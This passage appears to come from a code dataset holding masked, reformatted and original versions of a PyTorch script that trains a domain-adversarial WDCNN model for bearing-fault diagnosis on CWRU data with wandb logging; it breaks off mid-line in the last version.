"step-3": "<mask token>\nwandb.init(config=hyperparameter_defaults, project='WDCNN-DANN')\n<mask token>\n\n\ndef to_percent(temp, position):\n return '%1.0f' % temp + '%'\n\n\ndef weight_init(m):\n class_name = m.__class__.__name__\n if class_name.find('Conv') != -1:\n xavier_uniform_(m.weight.data)\n if class_name.find('Linear') != -1:\n xavier_uniform_(m.weight.data)\n\n\ndef batch_norm_init(m):\n class_name = m.__class__.__name__\n if class_name.find('BatchNorm') != -1:\n m.reset_running_stats()\n\n\ndef data_split_train(data_set, label_set):\n data_set_train = []\n data_set_val = []\n label_set_train = []\n label_set_val = []\n for i in range(data_set.shape[0]):\n index = np.arange(data_set.shape[1])\n np.random.shuffle(index)\n a = index[:int(data_set.shape[1] * 0.8)]\n data = data_set[i]\n data_train = data[a]\n data_val = np.delete(data, a, 0)\n data_set_train.append(data_train)\n data_set_val.append(data_val)\n label_set_train.extend(label_set[i][:len(data_train)])\n label_set_val.extend(label_set[i][:len(data_val)])\n data_set_train = np.array(data_set_train).reshape(-1, data_set.shape[-1])\n data_set_val = np.array(data_set_val).reshape(-1, data_set.shape[-1])\n label_set_train = np.array(label_set_train)\n label_set_val = np.array(label_set_val)\n return data_set_train, data_set_val, label_set_train, label_set_val\n\n\ndef train(train_dataset, val_dataset_s, val_dataset_t, train_dataset_t):\n global alpha\n length = len(train_dataset.tensors[0])\n optimizer = torch.optim.Adam(model.parameters(), lr=config.lr,\n weight_decay=config.weight_decay)\n train_dataloader = Data.DataLoader(train_dataset, batch_size=config.\n batch_train, shuffle=True)\n val_dataloader_s = Data.DataLoader(val_dataset_s, batch_size=config.\n batch_val, shuffle=False)\n val_dataloader_t = Data.DataLoader(val_dataset_t, batch_size=config.\n batch_val, shuffle=False)\n t_loader = Data.DataLoader(train_dataset_t, batch_size=int(config.\n batch_train), shuffle=True)\n val_loss_s = []\n val_loss_t = []\n val_acc_s = []\n val_acc_t = []\n cross_loss = []\n Source_Train_Acc = []\n for epoch in range(config.epochs):\n t_loader_iter = iter(t_loader)\n model.train()\n for index, (s_data_train, s_label_train) in enumerate(train_dataloader\n ):\n p = float(index) / 20\n alpha = 2.0 / (1.0 + np.exp(-10 * p)) - 1\n t_data_train = t_loader_iter.next()\n s_data_train = s_data_train.float().to(device).unsqueeze(dim=1)\n t_data_train = t_data_train[0].float().to(device).unsqueeze(dim=1)\n s_label_train = s_label_train.long().to(device)\n s_domain_label = torch.zeros(config.batch_train).long().cuda()\n t_domain_label = torch.ones(config.batch_train).long().cuda()\n s_out_train, s_domain_out = model(s_data_train, alpha)\n t_out_train, t_domain_out = model(t_data_train, alpha)\n loss_domain_s = criterion(s_domain_out, s_domain_label)\n loss_domain_t = criterion(t_domain_out, t_domain_label)\n loss_c = criterion(s_out_train, s_label_train)\n loss = loss_c + (loss_domain_s + loss_domain_t) * 0.02\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n pred_s = torch.argmax(s_out_train.data, 1)\n correct_s = pred_s.eq(s_label_train).cpu().sum()\n acc = 100.0 * correct_s.item() / len(s_data_train)\n Source_Train_Acc.append(acc)\n wandb.log({'Source Train Acc': acc})\n if index % 2 == 0:\n print(\n 'Train Epoch: {}/{} [{}/{} ({:.0f}%)] \\t Loss_c: {:.6f} Loss_d: {:.6f} Source Train Acc: {:.2f}%'\n .format(epoch, config.epochs, (index + 1) * len(\n s_data_train), length, 100.0 * (config.batch_train * (\n index + 1) / length), loss_c.item(), loss_domain_s.item\n () + loss_domain_t.item(), acc))\n model.eval()\n correct_val_s = 0\n sum_loss_s = 0\n length_val_s = len(val_dataset_s)\n for index, (s_data_val, s_label_val) in enumerate(val_dataloader_s):\n with torch.no_grad():\n s_data_val = s_data_val.float().to(device).unsqueeze(dim=1)\n s_label_val = s_label_val.long().to(device)\n output_val_s, _ = model(s_data_val, alpha)\n loss_s = criterion(output_val_s, s_label_val)\n pred_val_s = torch.argmax(output_val_s.data, 1)\n correct_val_s += pred_val_s.eq(s_label_val).cpu().sum()\n sum_loss_s += loss_s\n acc_s = 100.0 * correct_val_s.item() / length_val_s\n average_loss_s = sum_loss_s.item() / length_val_s\n correct_val_t = 0\n sum_loss_t = 0\n length_val_t = len(val_dataset_t)\n for index, (t_data_val, t_label_val) in enumerate(val_dataloader_t):\n with torch.no_grad():\n t_data_val = t_data_val.float().to(device).unsqueeze(dim=1)\n t_label_val = t_label_val.long().to(device)\n output_val_t, _ = model(t_data_val, alpha)\n loss_t = criterion(output_val_t, t_label_val)\n pred_val_t = torch.argmax(output_val_t.data, 1)\n correct_val_t += pred_val_t.eq(t_label_val).cpu().sum()\n sum_loss_t += loss_t\n acc_t = 100.0 * correct_val_t.item() / length_val_t\n average_loss_t = sum_loss_t.item() / length_val_t\n metrics = {'Acc_val_t': acc_t, 'epoch': epoch}\n wandb.log(metrics)\n print(\n \"\"\"\n The {}/{} epoch result : Average loss_s: {:.6f}, Acc_val_s: {:.2f}% , Average loss_t: {:.6f}, Acc_val_t: {:.2f}%\"\"\"\n .format(epoch, config.epochs, average_loss_s, acc_s,\n average_loss_t, acc_t))\n val_loss_s.append(loss_s.item())\n val_loss_t.append(loss_t.item())\n val_acc_t.append(acc_t)\n val_acc_s.append(acc_s)\n torch.save(model.state_dict(), os.path.join(wandb.run.dir, 'model.pth'))\n plt.plot(val_acc_s, 'r-', marker='s')\n plt.plot(val_acc_t, 'g-', marker='*')\n plt.legend(['Source domain validation accuracy',\n 'Target domain validation accuracy'])\n plt.xlabel('Epochs')\n plt.ylabel('validation accuracy')\n plt.title('Source doamin & Target domain Validation Accuracy Rate')\n plt.gca().yaxis.set_major_formatter(FuncFormatter(to_percent))\n plt.savefig('Source doamin & Target domain Validation Accuracy Rate.png')\n plt.show()\n plt.plot(val_loss_s, 'r-', marker='o')\n plt.plot(val_loss_t, 'g-', marker='x')\n plt.legend(['Source domain validation Loss',\n 'Target domain validation Loss'])\n plt.xlabel('Epochs')\n plt.ylabel('val_loss')\n plt.title('Source domain & Target domain Validation Loss')\n plt.savefig('Source domain & Target domain Validation Loss')\n plt.show()\n\n\ndef test(test_dataset):\n model.eval()\n length = len(test_dataset)\n correct = 0\n test_loader = Data.DataLoader(test_dataset, batch_size=config.\n batch_test, shuffle=False)\n y_test = []\n y_pred = []\n for index, (data, label) in enumerate(test_loader):\n with torch.no_grad():\n data = data.float().to(device)\n label = label.long().to(device)\n y_test.append(label)\n output, _ = model(data.unsqueeze(dim=1), alpha)\n pred = torch.argmax(output.data, 1)\n y_pred.append(pred)\n correct += pred.eq(label).cpu().sum()\n acc = 100.0 * correct / length\n return acc\n\n\nif __name__ == '__main__':\n torch.cuda.empty_cache()\n if torch.cuda.is_available():\n device = 'cuda'\n else:\n device = 'cpu'\n device = torch.device(device)\n dataset_s_train = np.load('bearing numpy data\\\\dataset_train_0HP_100.npz')\n dataset_s_test = np.load('bearing numpy data\\\\dataset_val_0HP_80.npz')\n dataset_t_train = np.load('bearing numpy data\\\\dataset_train_3HP_100.npz')\n dataset_t_test = np.load('bearing numpy data\\\\dataset_val_3HP_80.npz')\n data_s_train_val = dataset_s_train['data']\n data_s_test = dataset_s_test['data'].reshape(-1, 1024)\n data_t_train_val = dataset_t_train['data']\n data_t_test = dataset_t_test['data'].reshape(-1, 1024)\n label_s_train_val = dataset_s_train['label']\n label_s_test = dataset_s_test['label'].reshape(1, -1)\n label_t_train_val = dataset_t_train['label']\n label_t_test = dataset_t_test['label'].reshape(1, -1)\n iteration_acc = []\n test_acc_s = []\n for iteration in range(1):\n model = WDCNN1(C_in=1, class_num=10).to(device)\n model.apply(weight_init)\n model.apply(batch_norm_init)\n data_s_train, data_s_val, label_s_train, label_s_val = (\n data_split_train(data_s_train_val, label_s_train_val))\n data_t_train, data_t_val, _, label_t_val = data_split_train(\n data_t_train_val, label_t_train_val)\n data_s_train = torch.from_numpy(data_s_train)\n data_s_val = torch.from_numpy(data_s_val)\n data_t_val = torch.from_numpy(data_t_val)\n data_s_test = torch.from_numpy(data_s_test)\n data_t_train = torch.from_numpy(data_t_train)\n data_t_test = torch.from_numpy(data_t_test)\n label_s_train = torch.from_numpy(label_s_train)\n label_s_val = torch.from_numpy(label_s_val)\n label_t_val = torch.from_numpy(label_t_val)\n label_s_test = torch.from_numpy(label_s_test)\n label_t_test = torch.from_numpy(label_t_test)\n train_dataset_s = Data.TensorDataset(data_s_train, label_s_train)\n train_dataset_t = Data.TensorDataset(data_t_train)\n val_dataset_s = Data.TensorDataset(data_s_val, label_s_val)\n val_dataset_t = Data.TensorDataset(data_t_val, label_t_val)\n test_dataset_s = Data.TensorDataset(data_s_test, label_s_test.squeeze()\n )\n test_dataset_t = Data.TensorDataset(data_t_test, label_t_test.squeeze()\n )\n criterion = nn.NLLLoss()\n train(train_dataset_s, val_dataset_s, val_dataset_t, train_dataset_t)\n s_test_acc = test(test_dataset_s)\n t_test_acc = test(test_dataset_t)\n print('\\n source_acc: {:.2f}% target_acc: {:.2f}%'.format(\n s_test_acc, t_test_acc))\n wandb.finish()\n",
"step-4": "import torch\nimport numpy as np\nimport torch.nn as nn\nimport argparse\nfrom model import WDCNN1\nfrom torch.nn.init import xavier_uniform_\nimport torch.utils.data as Data\nimport matplotlib.pylab as plt\nimport wandb\nimport os\nfrom matplotlib.ticker import FuncFormatter\nhyperparameter_defaults = dict(epochs=70, batch_train=40, batch_val=50,\n batch_test=40, lr=0.0002, weight_decay=0.0005, r=0.02)\nwandb.init(config=hyperparameter_defaults, project='WDCNN-DANN')\nconfig = wandb.config\nplt.rcParams['font.family'] = ['Times New Roman']\n\n\ndef to_percent(temp, position):\n return '%1.0f' % temp + '%'\n\n\ndef weight_init(m):\n class_name = m.__class__.__name__\n if class_name.find('Conv') != -1:\n xavier_uniform_(m.weight.data)\n if class_name.find('Linear') != -1:\n xavier_uniform_(m.weight.data)\n\n\ndef batch_norm_init(m):\n class_name = m.__class__.__name__\n if class_name.find('BatchNorm') != -1:\n m.reset_running_stats()\n\n\ndef data_split_train(data_set, label_set):\n data_set_train = []\n data_set_val = []\n label_set_train = []\n label_set_val = []\n for i in range(data_set.shape[0]):\n index = np.arange(data_set.shape[1])\n np.random.shuffle(index)\n a = index[:int(data_set.shape[1] * 0.8)]\n data = data_set[i]\n data_train = data[a]\n data_val = np.delete(data, a, 0)\n data_set_train.append(data_train)\n data_set_val.append(data_val)\n label_set_train.extend(label_set[i][:len(data_train)])\n label_set_val.extend(label_set[i][:len(data_val)])\n data_set_train = np.array(data_set_train).reshape(-1, data_set.shape[-1])\n data_set_val = np.array(data_set_val).reshape(-1, data_set.shape[-1])\n label_set_train = np.array(label_set_train)\n label_set_val = np.array(label_set_val)\n return data_set_train, data_set_val, label_set_train, label_set_val\n\n\ndef train(train_dataset, val_dataset_s, val_dataset_t, train_dataset_t):\n global alpha\n length = len(train_dataset.tensors[0])\n optimizer = torch.optim.Adam(model.parameters(), lr=config.lr,\n weight_decay=config.weight_decay)\n train_dataloader = Data.DataLoader(train_dataset, batch_size=config.\n batch_train, shuffle=True)\n val_dataloader_s = Data.DataLoader(val_dataset_s, batch_size=config.\n batch_val, shuffle=False)\n val_dataloader_t = Data.DataLoader(val_dataset_t, batch_size=config.\n batch_val, shuffle=False)\n t_loader = Data.DataLoader(train_dataset_t, batch_size=int(config.\n batch_train), shuffle=True)\n val_loss_s = []\n val_loss_t = []\n val_acc_s = []\n val_acc_t = []\n cross_loss = []\n Source_Train_Acc = []\n for epoch in range(config.epochs):\n t_loader_iter = iter(t_loader)\n model.train()\n for index, (s_data_train, s_label_train) in enumerate(train_dataloader\n ):\n p = float(index) / 20\n alpha = 2.0 / (1.0 + np.exp(-10 * p)) - 1\n t_data_train = t_loader_iter.next()\n s_data_train = s_data_train.float().to(device).unsqueeze(dim=1)\n t_data_train = t_data_train[0].float().to(device).unsqueeze(dim=1)\n s_label_train = s_label_train.long().to(device)\n s_domain_label = torch.zeros(config.batch_train).long().cuda()\n t_domain_label = torch.ones(config.batch_train).long().cuda()\n s_out_train, s_domain_out = model(s_data_train, alpha)\n t_out_train, t_domain_out = model(t_data_train, alpha)\n loss_domain_s = criterion(s_domain_out, s_domain_label)\n loss_domain_t = criterion(t_domain_out, t_domain_label)\n loss_c = criterion(s_out_train, s_label_train)\n loss = loss_c + (loss_domain_s + loss_domain_t) * 0.02\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n pred_s = torch.argmax(s_out_train.data, 1)\n correct_s = pred_s.eq(s_label_train).cpu().sum()\n acc = 100.0 * correct_s.item() / len(s_data_train)\n Source_Train_Acc.append(acc)\n wandb.log({'Source Train Acc': acc})\n if index % 2 == 0:\n print(\n 'Train Epoch: {}/{} [{}/{} ({:.0f}%)] \\t Loss_c: {:.6f} Loss_d: {:.6f} Source Train Acc: {:.2f}%'\n .format(epoch, config.epochs, (index + 1) * len(\n s_data_train), length, 100.0 * (config.batch_train * (\n index + 1) / length), loss_c.item(), loss_domain_s.item\n () + loss_domain_t.item(), acc))\n model.eval()\n correct_val_s = 0\n sum_loss_s = 0\n length_val_s = len(val_dataset_s)\n for index, (s_data_val, s_label_val) in enumerate(val_dataloader_s):\n with torch.no_grad():\n s_data_val = s_data_val.float().to(device).unsqueeze(dim=1)\n s_label_val = s_label_val.long().to(device)\n output_val_s, _ = model(s_data_val, alpha)\n loss_s = criterion(output_val_s, s_label_val)\n pred_val_s = torch.argmax(output_val_s.data, 1)\n correct_val_s += pred_val_s.eq(s_label_val).cpu().sum()\n sum_loss_s += loss_s\n acc_s = 100.0 * correct_val_s.item() / length_val_s\n average_loss_s = sum_loss_s.item() / length_val_s\n correct_val_t = 0\n sum_loss_t = 0\n length_val_t = len(val_dataset_t)\n for index, (t_data_val, t_label_val) in enumerate(val_dataloader_t):\n with torch.no_grad():\n t_data_val = t_data_val.float().to(device).unsqueeze(dim=1)\n t_label_val = t_label_val.long().to(device)\n output_val_t, _ = model(t_data_val, alpha)\n loss_t = criterion(output_val_t, t_label_val)\n pred_val_t = torch.argmax(output_val_t.data, 1)\n correct_val_t += pred_val_t.eq(t_label_val).cpu().sum()\n sum_loss_t += loss_t\n acc_t = 100.0 * correct_val_t.item() / length_val_t\n average_loss_t = sum_loss_t.item() / length_val_t\n metrics = {'Acc_val_t': acc_t, 'epoch': epoch}\n wandb.log(metrics)\n print(\n \"\"\"\n The {}/{} epoch result : Average loss_s: {:.6f}, Acc_val_s: {:.2f}% , Average loss_t: {:.6f}, Acc_val_t: {:.2f}%\"\"\"\n .format(epoch, config.epochs, average_loss_s, acc_s,\n average_loss_t, acc_t))\n val_loss_s.append(loss_s.item())\n val_loss_t.append(loss_t.item())\n val_acc_t.append(acc_t)\n val_acc_s.append(acc_s)\n torch.save(model.state_dict(), os.path.join(wandb.run.dir, 'model.pth'))\n plt.plot(val_acc_s, 'r-', marker='s')\n plt.plot(val_acc_t, 'g-', marker='*')\n plt.legend(['Source domain validation accuracy',\n 'Target domain validation accuracy'])\n plt.xlabel('Epochs')\n plt.ylabel('validation accuracy')\n plt.title('Source doamin & Target domain Validation Accuracy Rate')\n plt.gca().yaxis.set_major_formatter(FuncFormatter(to_percent))\n plt.savefig('Source doamin & Target domain Validation Accuracy Rate.png')\n plt.show()\n plt.plot(val_loss_s, 'r-', marker='o')\n plt.plot(val_loss_t, 'g-', marker='x')\n plt.legend(['Source domain validation Loss',\n 'Target domain validation Loss'])\n plt.xlabel('Epochs')\n plt.ylabel('val_loss')\n plt.title('Source domain & Target domain Validation Loss')\n plt.savefig('Source domain & Target domain Validation Loss')\n plt.show()\n\n\ndef test(test_dataset):\n model.eval()\n length = len(test_dataset)\n correct = 0\n test_loader = Data.DataLoader(test_dataset, batch_size=config.\n batch_test, shuffle=False)\n y_test = []\n y_pred = []\n for index, (data, label) in enumerate(test_loader):\n with torch.no_grad():\n data = data.float().to(device)\n label = label.long().to(device)\n y_test.append(label)\n output, _ = model(data.unsqueeze(dim=1), alpha)\n pred = torch.argmax(output.data, 1)\n y_pred.append(pred)\n correct += pred.eq(label).cpu().sum()\n acc = 100.0 * correct / length\n return acc\n\n\nif __name__ == '__main__':\n torch.cuda.empty_cache()\n if torch.cuda.is_available():\n device = 'cuda'\n else:\n device = 'cpu'\n device = torch.device(device)\n dataset_s_train = np.load('bearing numpy data\\\\dataset_train_0HP_100.npz')\n dataset_s_test = np.load('bearing numpy data\\\\dataset_val_0HP_80.npz')\n dataset_t_train = np.load('bearing numpy data\\\\dataset_train_3HP_100.npz')\n dataset_t_test = np.load('bearing numpy data\\\\dataset_val_3HP_80.npz')\n data_s_train_val = dataset_s_train['data']\n data_s_test = dataset_s_test['data'].reshape(-1, 1024)\n data_t_train_val = dataset_t_train['data']\n data_t_test = dataset_t_test['data'].reshape(-1, 1024)\n label_s_train_val = dataset_s_train['label']\n label_s_test = dataset_s_test['label'].reshape(1, -1)\n label_t_train_val = dataset_t_train['label']\n label_t_test = dataset_t_test['label'].reshape(1, -1)\n iteration_acc = []\n test_acc_s = []\n for iteration in range(1):\n model = WDCNN1(C_in=1, class_num=10).to(device)\n model.apply(weight_init)\n model.apply(batch_norm_init)\n data_s_train, data_s_val, label_s_train, label_s_val = (\n data_split_train(data_s_train_val, label_s_train_val))\n data_t_train, data_t_val, _, label_t_val = data_split_train(\n data_t_train_val, label_t_train_val)\n data_s_train = torch.from_numpy(data_s_train)\n data_s_val = torch.from_numpy(data_s_val)\n data_t_val = torch.from_numpy(data_t_val)\n data_s_test = torch.from_numpy(data_s_test)\n data_t_train = torch.from_numpy(data_t_train)\n data_t_test = torch.from_numpy(data_t_test)\n label_s_train = torch.from_numpy(label_s_train)\n label_s_val = torch.from_numpy(label_s_val)\n label_t_val = torch.from_numpy(label_t_val)\n label_s_test = torch.from_numpy(label_s_test)\n label_t_test = torch.from_numpy(label_t_test)\n train_dataset_s = Data.TensorDataset(data_s_train, label_s_train)\n train_dataset_t = Data.TensorDataset(data_t_train)\n val_dataset_s = Data.TensorDataset(data_s_val, label_s_val)\n val_dataset_t = Data.TensorDataset(data_t_val, label_t_val)\n test_dataset_s = Data.TensorDataset(data_s_test, label_s_test.squeeze()\n )\n test_dataset_t = Data.TensorDataset(data_t_test, label_t_test.squeeze()\n )\n criterion = nn.NLLLoss()\n train(train_dataset_s, val_dataset_s, val_dataset_t, train_dataset_t)\n s_test_acc = test(test_dataset_s)\n t_test_acc = test(test_dataset_t)\n print('\\n source_acc: {:.2f}% target_acc: {:.2f}%'.format(\n s_test_acc, t_test_acc))\n wandb.finish()\n",
"step-5": "# -*- coding: utf-8 -*-\r\n# @Time : 2022-03-09 21:51\r\n# @Author : 袁肖瀚\r\n# @FileName: WDCNN-DANN.py\r\n# @Software: PyCharm\r\nimport torch\r\nimport numpy as np\r\nimport torch.nn as nn\r\nimport argparse\r\nfrom model import WDCNN1\r\nfrom torch.nn.init import xavier_uniform_\r\nimport torch.utils.data as Data\r\nimport matplotlib.pylab as plt\r\nimport wandb\r\nimport os\r\nfrom matplotlib.ticker import FuncFormatter\r\n\r\n#定义wandb参数\r\nhyperparameter_defaults = dict(\r\n epochs=70,\r\n batch_train=40,\r\n batch_val=50,\r\n batch_test=40,\r\n lr=0.0002,\r\n weight_decay=0.0005,\r\n r=0.02\r\n)\r\n\r\nwandb.init(config=hyperparameter_defaults, project=\"WDCNN-DANN\")\r\nconfig = wandb.config\r\n\r\n\r\nplt.rcParams['font.family'] = ['Times New Roman']\r\n\r\ndef to_percent(temp, position):\r\n return '%1.0f' % (temp) + '%'\r\n\r\n# model initialization 参数初始化\r\ndef weight_init(m):\r\n class_name = m.__class__.__name__ #得到网络层的名字\r\n if class_name.find('Conv') != -1: # 使用了find函数,如果不存在返回值为-1,所以让其不等于-1\r\n xavier_uniform_(m.weight.data)\r\n if class_name.find('Linear') != -1:\r\n xavier_uniform_(m.weight.data)\r\n\r\ndef batch_norm_init(m):\r\n\r\n class_name = m.__class__.__name__\r\n if class_name.find('BatchNorm') != -1:\r\n m.reset_running_stats()\r\n\r\n\r\n# split train and split data\r\ndef data_split_train(data_set, label_set):\r\n data_set_train = []\r\n data_set_val = []\r\n label_set_train = []\r\n label_set_val = []\r\n\r\n for i in range(data_set.shape[0]): #行数 shape[2]通道数\r\n index = np.arange(data_set.shape[1]) #列数矩阵[0 1 2 ''']\r\n np.random.shuffle(index) #随机打乱数据 每次shuffle后数据都被打乱,这个方法可以在机器学习训练的时候在每个epoch结束后将数据重新洗牌进入下一个epoch的学习\r\n a = index[:int((data_set.shape[1]) * 0.8)]\r\n data = data_set[i] #第i行\r\n\r\n data_train = data[a]\r\n data_val = np.delete(data, a, 0)\r\n data_set_train.append(data_train)\r\n data_set_val.append(data_val)\r\n label_set_train.extend(label_set[i][:len(data_train)])\r\n label_set_val.extend(label_set[i][:len(data_val)])\r\n data_set_train = np.array(data_set_train).reshape(-1, data_set.shape[-1])\r\n data_set_val = np.array(data_set_val).reshape(-1, data_set.shape[-1])\r\n label_set_train = np.array(label_set_train)\r\n label_set_val = np.array(label_set_val)\r\n\r\n return data_set_train, data_set_val, label_set_train, label_set_val\r\n\r\n\r\n# training process\r\ndef train(train_dataset, val_dataset_s, val_dataset_t,train_dataset_t):\r\n global alpha\r\n #torch.cuda.empty_cache()\r\n\r\n length = len(train_dataset.tensors[0])\r\n optimizer = torch.optim.Adam(model.parameters(), lr=config.lr, weight_decay=config.weight_decay)\r\n train_dataloader = Data.DataLoader(train_dataset, batch_size=config.batch_train, shuffle=True)\r\n\r\n val_dataloader_s = Data.DataLoader(val_dataset_s, batch_size=config.batch_val, shuffle=False)\r\n val_dataloader_t = Data.DataLoader(val_dataset_t, batch_size=config.batch_val, shuffle=False)\r\n\r\n t_loader = Data.DataLoader(train_dataset_t, batch_size=int(config.batch_train), shuffle=True) # 修改这里,保证两个训练集的迭代次数一致\r\n # t_loader_iter = iter(t_loader)\r\n\r\n val_loss_s = []\r\n val_loss_t = []\r\n val_acc_s = []\r\n val_acc_t = []\r\n cross_loss = [] #暂时不知道作用\r\n Source_Train_Acc=[]\r\n\r\n for epoch in range(config.epochs):\r\n # t_loader = Data.DataLoader(train_dataset_t, batch_size=int(args.batch_train),shuffle=True) # 修改这里,保证两个训练集的迭代次数一致\r\n t_loader_iter = iter(t_loader)\r\n\r\n model.train()\r\n for index, (s_data_train, s_label_train) in enumerate(train_dataloader):\r\n p = float(index) / 20\r\n alpha = 2. / (1. + np.exp(-10 * p)) - 1\r\n t_data_train = t_loader_iter.next()\r\n s_data_train = s_data_train.float().to(device).unsqueeze(dim=1)\r\n t_data_train = t_data_train[0].float().to(device).unsqueeze(dim=1)\r\n s_label_train = s_label_train.long().to(device)\r\n\r\n s_domain_label = torch.zeros(config.batch_train).long().cuda()\r\n t_domain_label = torch.ones(config.batch_train).long().cuda()\r\n\r\n s_out_train, s_domain_out = model(s_data_train, alpha)\r\n t_out_train, t_domain_out = model(t_data_train, alpha)\r\n\r\n\r\n loss_domain_s = criterion(s_domain_out, s_domain_label) #源域域分类损失\r\n loss_domain_t = criterion(t_domain_out, t_domain_label) #目标域域分类损失\r\n\r\n loss_c = criterion(s_out_train, s_label_train) #分类器损失\r\n loss = loss_c + (loss_domain_s + loss_domain_t)*0.02\r\n\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n pred_s = torch.argmax(s_out_train.data, 1) # 返回指定维度最大值的序号 dim=1\r\n correct_s = pred_s.eq(s_label_train).cpu().sum() #源域正确率\r\n acc = 100. * correct_s.item() / len(s_data_train)\r\n Source_Train_Acc.append(acc)\r\n wandb.log({\"Source Train Acc\": acc})\r\n\r\n if index % 2 == 0:\r\n print('Train Epoch: {}/{} [{}/{} ({:.0f}%)] \\t Loss_c: {:.6f} Loss_d: {:.6f} Source Train Acc: {:.2f}%'.format\r\n (epoch, config.epochs, (index + 1) * len(s_data_train), length,\r\n 100. * (config.batch_train * (index + 1) / length), loss_c.item(),\r\n loss_domain_s.item() + loss_domain_t.item()\r\n , acc))\r\n\r\n #validation\r\n model.eval()\r\n #源域验证\r\n correct_val_s = 0\r\n sum_loss_s = 0\r\n length_val_s = len(val_dataset_s)\r\n for index, (s_data_val, s_label_val) in enumerate(val_dataloader_s):\r\n with torch.no_grad():\r\n s_data_val = s_data_val.float().to(device).unsqueeze(dim=1)\r\n s_label_val = s_label_val.long().to(device)\r\n\r\n output_val_s, _ = model(s_data_val, alpha)\r\n loss_s = criterion(output_val_s, s_label_val)\r\n\r\n pred_val_s = torch.argmax(output_val_s.data, 1)\r\n correct_val_s += pred_val_s.eq(s_label_val).cpu().sum()\r\n sum_loss_s += loss_s\r\n acc_s = 100. * correct_val_s.item() / length_val_s #源域正确率\r\n average_loss_s = sum_loss_s.item() / length_val_s #源域损失\r\n\r\n #目标域验证\r\n correct_val_t = 0\r\n sum_loss_t = 0\r\n length_val_t = len(val_dataset_t)\r\n for index, (t_data_val, t_label_val) in enumerate(val_dataloader_t):\r\n with torch.no_grad():\r\n t_data_val = t_data_val.float().to(device).unsqueeze(dim=1)\r\n t_label_val = t_label_val.long().to(device)\r\n\r\n output_val_t, _ = model(t_data_val, alpha)\r\n loss_t = criterion(output_val_t, t_label_val)\r\n\r\n pred_val_t = torch.argmax(output_val_t.data, 1)\r\n correct_val_t += pred_val_t.eq(t_label_val).cpu().sum()\r\n sum_loss_t += loss_t\r\n acc_t = 100. * correct_val_t.item() / length_val_t #目标域正确率\r\n average_loss_t = sum_loss_t.item() / length_val_t #目标域损失\r\n\r\n metrics = {\"Acc_val_t\": acc_t, 'epoch':epoch}\r\n wandb.log(metrics)\r\n\r\n\r\n print('\\n The {}/{} epoch result : Average loss_s: {:.6f}, Acc_val_s: {:.2f}% , Average loss_t: {:.6f}, Acc_val_t: {:.2f}%'.format(\r\n epoch, config.epochs, average_loss_s, acc_s,average_loss_t, acc_t))\r\n\r\n val_loss_s.append(loss_s.item())\r\n val_loss_t.append(loss_t.item())\r\n val_acc_t.append(acc_t)\r\n val_acc_s.append(acc_s)\r\n\r\n torch.save(model.state_dict(), os.path.join(wandb.run.dir, \"model.pth\"))\r\n\r\n #画出验证集正确率曲线\r\n plt.plot(val_acc_s, 'r-',marker='s')\r\n plt.plot(val_acc_t, 'g-',marker='*')\r\n plt.legend([\"Source domain validation accuracy\", \"Target domain validation accuracy\"])\r\n plt.xlabel('Epochs')\r\n plt.ylabel('validation accuracy')\r\n plt.title('Source doamin & Target domain Validation Accuracy Rate')\r\n plt.gca().yaxis.set_major_formatter(FuncFormatter(to_percent))\r\n plt.savefig(\"Source doamin & Target domain Validation Accuracy Rate.png\")\r\n plt.show()\r\n\r\n #画出验证集损失\r\n plt.plot(val_loss_s, 'r-',marker='o')\r\n plt.plot(val_loss_t, 'g-',marker='x')\r\n plt.legend([\"Source domain validation Loss\", \"Target domain validation Loss\"])\r\n plt.xlabel('Epochs')\r\n plt.ylabel('val_loss')\r\n plt.title('Source domain & Target domain Validation Loss')\r\n plt.savefig(\"Source domain & Target domain Validation Loss\")\r\n plt.show()\r\n\r\n\r\n# testing\r\ndef test(test_dataset):\r\n model.eval()\r\n length = len(test_dataset)\r\n correct = 0\r\n test_loader = Data.DataLoader(test_dataset, batch_size=config.batch_test, shuffle=False)\r\n\r\n y_test = []\r\n y_pred = []\r\n\r\n for index, (data, label) in enumerate(test_loader):\r\n with torch.no_grad():\r\n data = data.float().to(device)\r\n label = label.long().to(device)\r\n y_test.append(label)\r\n\r\n output, _ = model(data.unsqueeze(dim=1), alpha)\r\n pred = torch.argmax(output.data, 1)\r\n y_pred.append(pred)\r\n correct += pred.eq(label).cpu().sum()\r\n\r\n acc = 100. * correct / length\r\n return acc\r\n\r\n\r\nif __name__ == '__main__':\r\n torch.cuda.empty_cache()\r\n # use cpu or gpu\r\n if torch.cuda.is_available():\r\n device = 'cuda'\r\n else:\r\n device = 'cpu'\r\n device = torch.device(device)\r\n\r\n # CWRU\r\n dataset_s_train = np.load(r'bearing numpy data\\dataset_train_0HP_100.npz')\r\n dataset_s_test = np.load(r'bearing numpy data\\dataset_val_0HP_80.npz')\r\n dataset_t_train = np.load(r'bearing numpy data\\dataset_train_3HP_100.npz')\r\n dataset_t_test = np.load(r'bearing numpy data\\dataset_val_3HP_80.npz')\r\n\r\n data_s_train_val = dataset_s_train['data']\r\n data_s_test = dataset_s_test['data'].reshape(-1, 1024)\r\n data_t_train_val = dataset_t_train['data']\r\n data_t_test = dataset_t_test['data'].reshape(-1, 1024)\r\n label_s_train_val = dataset_s_train['label']\r\n label_s_test = dataset_s_test['label'].reshape(1, -1)\r\n label_t_train_val = dataset_t_train['label']\r\n label_t_test = dataset_t_test['label'].reshape(1, -1)\r\n\r\n iteration_acc = []\r\n\r\n test_acc_s = []\r\n\r\n\r\n # repeat several times for an average result\r\n for iteration in range(1):\r\n # load model\r\n model = WDCNN1(C_in=1, class_num=10).to(device)\r\n model.apply(weight_init)\r\n model.apply(batch_norm_init)\r\n\r\n # train/val\r\n data_s_train, data_s_val, label_s_train, label_s_val = data_split_train(data_s_train_val, label_s_train_val)\r\n data_t_train, data_t_val, _, label_t_val = data_split_train(data_t_train_val, label_t_train_val)\r\n\r\n # transfer ndarray to tensor\r\n data_s_train = torch.from_numpy(data_s_train)\r\n data_s_val = torch.from_numpy(data_s_val)\r\n data_t_val = torch.from_numpy(data_t_val) #加的验证\r\n data_s_test = torch.from_numpy(data_s_test)\r\n\r\n data_t_train = torch.from_numpy(data_t_train)\r\n data_t_test = torch.from_numpy(data_t_test)\r\n\r\n label_s_train = torch.from_numpy(label_s_train)\r\n label_s_val = torch.from_numpy(label_s_val)\r\n label_t_val = torch.from_numpy(label_t_val) #加的验证\r\n label_s_test = torch.from_numpy(label_s_test)\r\n #label_t_train = 